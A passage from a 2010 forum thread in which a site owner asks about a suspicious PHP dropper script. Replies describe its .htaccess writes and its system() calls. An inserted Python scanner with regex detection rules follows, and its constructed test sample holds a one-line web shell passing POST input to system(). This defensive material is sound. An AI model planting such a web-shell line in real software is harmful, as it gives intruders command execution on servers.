"<ok>"; } Main(); ?>
jstern Posted May 12, 2010
It looks pretty malicious to me. It also looks like it will rename itself, or its directory, periodically. Not sure what it does though. Possibly an attack (brute force) script? The fact that it is trying to open / read to your .htaccess file ($fht = fopen("$tname/.htaccess", "w+")) tells me you should get rid of it as well.
Andrea Posted May 12, 2010
Thanks Stern. I didn't think it was anything good, but I don't know enough PHP to understand what this is saying.
BeeDev Posted May 12, 2010
We had a similar case before, where a script was dropped in every folder of the website. This script was sending some e-mails to some address specified in the querystring when called by the browser. Looked like it was sending the file/folder structure of the website etc. We had to delete it all and change all the FTP passwords etc. Basically it's a good time to change your passwords now, and those for any other usernames which have access to this FTP space. After you've done that, it'll be a good idea to scan the whole website for any remainder of this code.
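A scan of the kind suggested above could look like the following. This is an added example, not part of the original thread and not any poster's code. The rule names, the choice of working-file names, the suffix list and the sample site are assumptions built only from what the quoted qxn.php / tur.php visibly does.

```python
import os
import re
import tempfile

# Content rules taken from what the quoted qxn.php / tur.php visibly does.
CONTENT_RULES = {
    # Com(): a request parameter handed straight to a command-execution call.
    "request_to_exec": re.compile(
        r"\b(?:system|exec|passthru|shell_exec|popen|proc_open)\s*\(\s*"
        r"\$_(?:GET|POST|REQUEST|COOKIE)\b"),
    # GenNew()/Gen()/Gen2(): the script opens .htaccess for writing.
    "htaccess_write": re.compile(
        r"fopen\s*\(\s*[\"'][^\"']*\.htaccess[\"']\s*,\s*[\"'][wa]"),
    # MRepl()/Clear2(): markers wrapped around the block appended to a page.
    "injection_marker": re.compile(r"<dd[45]>|<!--dd[45]-->"),
    # MRepl(): the zero-size <font> wrapper that hides the appended block.
    "hidden_zero_size_block": re.compile(
        r"position:\s*absolute;\s*overflow:\s*hidden;\s*height:\s*0;\s*width:\s*0"),
}
# Working files the script reads, writes or deletes beside itself (heuristic).
STATE_FILES = {"c", "m", "1t", "1g", "1r.txt", "2r.txt", "w.txt"}
TEXT_SUFFIXES = (".php", ".html", ".htm")
MAX_CHARS = 2_000_000  # assumption: cap on how much of each file is read


def scan_text(text):
    """Return the sorted names of the content rules that match `text`."""
    return sorted(n for n, rx in CONTENT_RULES.items() if rx.search(text))


def scan_tree(root):
    """Walk `root` and return {relative_path: [rule names]} for every hit."""
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        has_php = any(f.lower().endswith(".php") for f in files)
        for fname in files:
            path = os.path.join(dirpath, fname)
            hits = []
            # A one-letter or oddly named data file next to a PHP script.
            if has_php and fname in STATE_FILES:
                hits.append("dropper_state_file")
            if fname.lower().endswith(TEXT_SUFFIXES):
                try:
                    with open(path, encoding="utf-8", errors="replace") as fh:
                        hits += scan_text(fh.read(MAX_CHARS))
                except OSError:
                    hits.append("unreadable")
            if hits:
                rel = os.path.relpath(path, root).replace(os.sep, "/")
                findings[rel] = sorted(hits)
    return findings


# Constructed sample site (not real data): clean pages, one page carrying the
# hidden block, and a folder shaped like the "euhdy" folder from the post.
SAMPLE_SITE = {
    "index.html": "<html><body><p>Welcome</p></body></html>",
    "contact.php": "<?php echo 'contact form'; ?>",
    "about.html": "<html><body><p>About</p>"
                  "<dd4><font style=\"position: absolute;overflow: hidden;"
                  "height: 0;width: 0\"><a href='abcde.php'>abcde</a>"
                  "</font></body></html><dd5> ",
    "euhdy/tur.php": "<?php ignore_user_abort(1); set_time_limit(0);\n"
                     "function Com() { if (isset($_POST['c'])) "
                     "@system($_POST['c']); }\n"
                     "$fht = fopen(\"$tname/.htaccess\", \"w+\");\n",
    "euhdy/w.txt": "",
}


def scan_sample_site():
    """Write SAMPLE_SITE to a temporary directory and scan it."""
    with tempfile.TemporaryDirectory() as root:
        for rel, body in SAMPLE_SITE.items():
            path = os.path.join(root, *rel.split("/"))
            os.makedirs(os.path.dirname(path), exist_ok=True)
            with open(path, "w", encoding="utf-8") as fh:
                fh.write(body)
        return scan_tree(root)


if __name__ == "__main__":
    for rel, rules in sorted(scan_sample_site().items()):
        print(f"{rel}: {', '.join(rules)}")
```

A hit on `injection_marker` or `hidden_zero_size_block` in an ordinary site page means the page itself was modified, so deleting the dropped folders alone does not clean the site.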
krillz Posted May 12, 2010
Maybe time to increase the security on the system, as that is no good. If he has an upload script make sure you check it first.
Andrea Posted May 12, 2010
I'm the only one uploading. I'll check with the host tonight, but meanwhile I'm very curious what this script does. Can anyone tell?
krillz Posted May 12, 2010
Have you found these files somewhere: c, 1r.txt and 2r.txt? Check what's inside. From the looks of it, it's some kind of link generator; however, I don't like that it is using the system() function at all. Your only bet is to run the stuff in a sandbox and try it out; it could be anything from a link generator to an XSS injector to steal user info.
Andrea Posted May 12, 2010
The host was no help, and I ended up deleting the files. It's the same host I left recently because of similar issues, unfortunately not until after I'd recommended them to a couple clients. Live and Learn....